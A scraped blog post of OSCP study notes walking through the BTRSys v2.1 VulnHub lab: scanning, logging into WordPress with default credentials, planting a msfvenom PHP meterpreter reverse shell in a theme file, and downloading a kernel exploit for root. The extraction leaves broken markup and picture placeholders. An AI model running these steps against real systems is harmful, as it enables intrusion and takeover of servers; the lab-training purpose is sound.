OSCP Learning Notes – Capstone(2)

By Macbook

BTRSys v2.1 Walkthrough

Preparation:

Download the BTRSys virtual machine from the following website:

https://www.vulnhub.com/entry/btrsys-v21,196/

1. Find the IP address of the BTRSys virtual machine.

netdiscover -r 10.0.0.0/24

share picture< /p>

2. Perform the TCP/UDP scan using Nmap to find the potential vulnerabilities.

nmap -Pn -sS --stats-every 3m - max-retries 1 --max-scan-delay 20 --defeat-rst- ratelimit -T4 -p1-65535 -oN /root/Delete/tcp1.txt 10.0 .0.29

share picture

nmap -nvv -Pn- -sSV -p 21,22,80 --version-intensity 9 -A -oN /root/Delete/tcp2.txt 10.0.0.29

share picture

share picture

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/Delete/udp.txt 10.0. 0.29

share picture

< p>3. Browse th e target website(http://10.0.0.29) through Firefox.

Share a picture

4. Try to scan the file structure of the target server using the tool Nikto.

 nikto -h 10.0.0.29

< img alt="Share a picture" src="/wp-content/uploads/images/hardware/macbook/1626799820523.png" >

Browse the target website(http://10.0.0.29/robots. txt) through Firefox.

Share pictures

Browse the target website(http://10.0.0.29/robots.txt) through Firefox.

Share pictures

Try to login in the WordPress using default username/password(admin/admin).

share picture

Ahaaa! Login in the admin page successfully.

Share a picture< /p>

Go to the Edit Themes page.

Share a picture< /p>

share picture

5 . List all the payload in Kali Linux

msfvenom -l payload

share picture

Set the payload module and parameters.

msfvenom -p php /meterpreter/reverse_tcp lhost=10.0.0.26 lport=4444 -f raw

share picture

Copy, Paste and upload the generated PHP exploit code to the WordPress website.

Share pictures

6. Start the Metasploit on the Kali Linux and choose the proper module. Then set the payload module and parameters.

use exploit/multi/handler



set payload php/meterpreter/reverse_tcp



set lhost 10.0.0.26

< /div>

Share a picture

Browse the edited page(http:/ /10.0.0.29/wordpress/wp-content/themes/twentyfourteen/404.php) through Firefox.

share picture

So the communication between Kali Linux and BTRSys is established.

Share a picture

Execute the command help to find the commands we can grab.

Core Commands

============



 Command Description

 ------- -----------

? Help menu

 background Backgrounds the current session

 bg Alias ​​for background

 bgkill Kills a background meterpreter script

 bglist Lists running background scripts

 bgrun Executes a meterpreter script as a background thread

 channel Displays information or control active channels

 close Closes a channel

 disable_unicode_encoding Disables encoding of unicode strings

 enable_unicode_encoding Enables encoding of unicode strings

 exit Terminate the meterpreter session

 get_timeouts Get the current session timeout values

 guid Get the session GUID

 help Help menu

 info Displays information about a Post module

 irb Open an interactive Ruby shell on the current session

 load Load one or more meterpreter extensions

 machine_id Get the MSF ID of the machine attached to the session

 migrate Migrate the server to another process

 pry Open the Pry debugger on the current session

 quit Terminate the meterpreter session

 read Reads data from a channel

 resource Run the commands stored in a file

 run Executes a meterpreter script or Post module

 secure (Re)Negotiate TLV packet encryption on the session

 sessions Quickly switch to another session

 set_timeouts Set the current session timeout values

 sleep Force Meterpreter to go quiet, then re-establish session.

 transport Change the current transport mechanism

 use Deprecated alias for "load"

 uuid Get the UUID for the current session

 write Writes data to a channel





Stdapi: File system Commands

===========================



 Command Description

 ------- -----------

 cat Read the contents of a file to the screen

 cd Change directory

 checksum Retrieve the checksum of a file

 chmod Change the permissions of a file

 cp Copy source to destination

 dir List files (alias for ls)

 download Download a file or directory

 edit Edit a file

 getlwd Print local working directory

 getwd Print working directory

 lcd Change local working directory

 lls List local files

 lpwd Print local working directory

 ls List files

 mkdir Make directory

 mv Move source to destination

 pwd Print working directory

 rm Delete the specified file

 rmdir Remove directory

 search Search for files

 upload Upload a file or directory





Stdapi: Networking Commands

==========================



 Command Description

 ------- -----------

 portfwd Forward a local port to a remote service





Stdapi: System Commands

======================



 Command Description

 ------- -----------

 execute Execute a command

 getenv Get one or more environment variable values

 getpid Get the current process identifier

 getuid Get the user that the server is running as

 kill Terminate a process

 localtime Displays the target system‘s local date and time

 pgrep Filter processes by name

 pkill Terminate processes by name

 ps List running processes

 shell Drop into a system command shell

 sysinfo Gets information about the remote system, such as OS





Stdapi: Audio Output Commands

============================



 Command Description

 ------- -----------

 play play an audio file on target system, nothing written on disk

Find the Kernel version and current username of the BTRSys server.

sysinfo



getuid

share picture< /p>

7. Try to find the vulnerabilities related to Linux ubuntu 4.4.0-62-generic in the Exploit Database. Then download and copy the exploit code file to the folder /var/www/html.

https://www.exploit-db.com/exploits/41458

Share pictures

Compile the source code and download the executable file to BTRSys server.

gcc -o exploit 41458.c

share picture

wget http://10.0.0.26/exploit

Share pictures

Ahaaa! We get the root privilege by executing the exploit file.

share picture

netdiscover -r 10.0.< span style="color: #800080;">0.0/24

nmap- Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay  20 --defeat-rst-ratelimit -T4 -p1-65535 -oN /root/Delete/tcp1.txt 10.0.0.29

nmap -nvv -Pn-- sSV -p 21,22,80 --version-intensity 9 -A -oN /root/Delete/tcp2.txt 10.0.0.29

nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oN /root/Delete/udp.txt 10.0.0.29

nikto -h 10.0.0.29

msfvenom -l payload

< /p>

msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.0.26  lport=4444 -f raw

use exploit/multi/handler



set payload php/meterpreter/reverse_tcp



set lhost 10.0.0.26

< /p>

Core Commands

============



 Command Description

 ------- -----------

? Help menu

 background Backgrounds the current session

 bg Alias ​​for background

 bgkill Kills a background meterpreter script

 bglist Lists running background scripts

 bgrun Executes a meterpreter script as a background thread

 channel Displays information or control active channels

 close Closes a channel

 disable_unicode_encoding Disables encoding of unicode strings

 enable_unicode_encoding Enables encoding of unicode strings

 exit Terminate the meterpreter session

 get_timeouts Get the current session timeout values

 guid Get the session GUID

 help Help menu

 info Displays information about a Post module

 irb Open an interactive Ruby shell on the current session

 load Load one or more meterpreter extensions

 machine_id Get the MSF ID of the machine attached to the session

 migrate Migrate the server to another process

 pry Open the Pry debugger on the current session

 quit Terminate the meterpreter session

 read Reads data from a channel

 resource Run the commands stored in a file

 run Executes a meterpreter script or Post module

 secure (Re)Negotiate TLV packet encryption on the session

 sessions Quickly switch to another session

 set_timeouts Set the current session timeout values

 sleep Force Meterpreter to go quiet, then re-establish session.

 transport Change the current transport mechanism

 use Deprecated alias for "load"

 uuid Get the UUID for the current session

 write Writes data to a channel





Stdapi: File system Commands

===========================



 Command Description

 ------- -----------

 cat Read the contents of a file to the screen

 cd Change directory

 checksum Retrieve the checksum of a file

 chmod Change the permissions of a file

 cp Copy source to destination

 dir List files (alias for ls)

 download Download a file or directory

 edit Edit a file

 getlwd Print local working directory

 getwd Print working directory

 lcd Change local working directory

 lls List local files

 lpwd Print local working directory

 ls List files

 mkdir Make directory

 mv Move source to destination

 pwd Print working directory

 rm Delete the specified file

 rmdir Remove directory

 search Search for files

 upload Upload a file or directory





Stdapi: Networking Commands

==========================



 Command Description

 ------- -----------

 portfwd Forward a local port to a remote service





Stdapi: System Commands

======================



 Command Description

 ------- -----------

 execute Execute a command

 getenv Get one or more environment variable values

 getpid Get the current process identifier

 getuid Get the user that the server is running as

 kill Terminate a process

 localtime Displays the target system‘s local date and time

 pgrep Filter processes by name

 pkill Terminate processes by name

 ps List running processes

 shell Drop into a system command shell

 sysinfo Gets information about the remote system, such as OS





Stdapi: Audio Output Commands

============================



 Command Description

 ------- -----------

 play play an audio file on target system, nothing written on disk

sysinfo



getuid

gcc -o exploit 41458.c

wget http://10.0.0.26/exploit

, , ,

Leave a Comment

Your email address will not be published.